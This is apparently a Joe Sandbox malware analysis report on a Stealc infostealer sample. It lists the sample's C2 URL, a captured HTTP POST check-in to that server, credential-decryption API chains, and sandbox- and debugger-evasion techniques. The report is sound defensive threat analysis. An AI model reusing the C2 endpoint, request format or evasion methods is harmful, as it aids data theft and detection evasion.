Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1528404
MD5:ff372169f2c0278490593f4abbfcceac
SHA1:82f8e81327c943fe7e1ca4b2cf16116052f419f8
SHA256:25020e52a52db73e1c53c36bca3aa4dd40c57f609637745546e6e56076a4e439
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6780 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FF372169F2C0278490593F4ABBFCCEAC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1758098125.0000000004A80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6780JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6780JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.c50000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-07T22:08:10.098436+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.c50000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00C5C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C59AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00C59AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C57240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00C57240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C59B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00C59B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C68EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00C68EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C638B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C64910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C64910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00C5DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00C5E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C64570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C64570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00C5ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C516D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C63EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C63EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C5F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00C5BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C5DE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFCBFCBFBKEBFIDBKECHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 42 41 36 36 38 39 32 44 39 32 34 31 37 39 35 33 37 33 33 38 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 2d 2d 0d 0a Data Ascii: ------BKFCBFCBFBKEBFIDBKECContent-Disposition: form-data; name="hwid"4EBA66892D924179537338------BKFCBFCBFBKEBFIDBKECContent-Disposition: form-data; name="build"doma------BKFCBFCBFBKEBFIDBKEC--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C54880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00C54880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFCBFCBFBKEBFIDBKECHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 42 41 36 36 38 39 32 44 39 32 34 31 37 39 35 33 37 33 33 38 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 2d 2d 0d 0a Data Ascii: ------BKFCBFCBFBKEBFIDBKECContent-Disposition: form-data; name="hwid"4EBA66892D924179537338------BKFCBFCBFBKEBFIDBKECContent-Disposition: form-data; name="build"doma------BKFCBFCBFBKEBFIDBKEC--
                Source: file.exe, 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1798536060.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php65d60108622213
                Source: file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php;
                Source: file.exe, 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpY
                Source: file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpk
                Source: file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpx9
                Source: file.exe, 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37S

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F290F60_2_00F290F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA58F30_2_00FA58F3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA88CF0_2_00FA88CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101C1890_2_0101C189
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010638260_2_01063826
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED59B10_2_00ED59B1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102807C0_2_0102807C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01029BB40_2_01029BB4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010312360_2_01031236
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102D2740_2_0102D274
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102555A0_2_0102555A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101DCCA0_2_0101DCCA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010327290_2_01032729
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AA7750_2_010AA775
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF4FB20_2_00FF4FB2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F927590_2_00F92759
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102B6AD0_2_0102B6AD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01022EB20_2_01022EB2
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00C545C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: npcvtcpc ZLIB complexity 0.9952324127482477
                Source: file.exe, 00000000.00000003.1758098125.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C68680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00C68680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C63720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00C63720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\LEL4NSM5.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1909760 > 1048576
                Source: file.exeStatic PE information: Raw size of npcvtcpc is bigger than: 0x100000 < 0x1ac000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.c50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;npcvtcpc:EW;stnuknqq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;npcvtcpc:EW;stnuknqq:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C69860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C69860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1ded9a should be: 0x1e0d64
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: npcvtcpc
                Source: file.exeStatic PE information: section name: stnuknqq
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F290F6 push edi; mov dword ptr [esp], eax0_2_00F29100
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F290F6 push eax; mov dword ptr [esp], edx0_2_00F29168
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F290F6 push 7B73976Eh; mov dword ptr [esp], ebx0_2_00F29172
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F290F6 push edi; mov dword ptr [esp], ebx0_2_00F2920D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F290F6 push ecx; mov dword ptr [esp], eax0_2_00F29287
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F290F6 push 6209DF9Ch; mov dword ptr [esp], edx0_2_00F29321
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA58F3 push 4FD22DE1h; mov dword ptr [esp], ecx0_2_00FA590E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA58F3 push edx; mov dword ptr [esp], 77FBDC94h0_2_00FA59B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA58F3 push 04FE3CA5h; mov dword ptr [esp], esi0_2_00FA59E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA58F3 push 7860A1DFh; mov dword ptr [esp], edi0_2_00FA5A26
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01079112 push eax; mov dword ptr [esp], ebx0_2_01079188
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D8118 push edx; mov dword ptr [esp], eax0_2_010D8139
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D1920 push ebx; mov dword ptr [esp], ecx0_2_010D1937
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D1920 push edi; mov dword ptr [esp], esi0_2_010D1B0F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01030133 push eax; mov dword ptr [esp], 196E6A2Ch0_2_01030143
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA88CF push edi; mov dword ptr [esp], edx0_2_00FA88DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA88CF push eax; mov dword ptr [esp], 6B790D47h0_2_00FA893A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA88CF push 5AE7FEDBh; mov dword ptr [esp], eax0_2_00FA89F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA88CF push edi; mov dword ptr [esp], ebx0_2_00FA8A21
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA88CF push 2AD928E8h; mov dword ptr [esp], ecx0_2_00FA8A48
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107915D push 3EEF6C1Eh; mov dword ptr [esp], edx0_2_0107917B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107915D push ecx; mov dword ptr [esp], esi0_2_010791CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107915D push eax; mov dword ptr [esp], ecx0_2_010791DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107915D push 209DC19Fh; mov dword ptr [esp], edx0_2_010792B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BB97B push 26C36CA7h; mov dword ptr [esp], eax0_2_010BB9A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01038171 push 17E9E749h; mov dword ptr [esp], edx0_2_0103817F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101C189 push ebx; mov dword ptr [esp], ebp0_2_0101C1B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101C189 push 09B0C2BFh; mov dword ptr [esp], esi0_2_0101C1C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101C189 push eax; mov dword ptr [esp], ecx0_2_0101C21B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101C189 push eax; mov dword ptr [esp], esp0_2_0101C23F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101C189 push esi; mov dword ptr [esp], ecx0_2_0101C272
                Source: file.exeStatic PE information: section name: npcvtcpc entropy: 7.9550669046081595

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C69860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C69860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13564
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103799F second address: 10379A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10379A3 second address: 10379AC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10379AC second address: 10379B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036B63 second address: 1036B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036F62 second address: 1036F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10370A3 second address: 10370B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0D4776372h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10370B9 second address: 10370C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FB0D54BC066h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103721C second address: 1037234 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4776374h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1037234 second address: 103724F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB0D54BC07Dh 0x00000008 jmp 00007FB0D54BC071h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
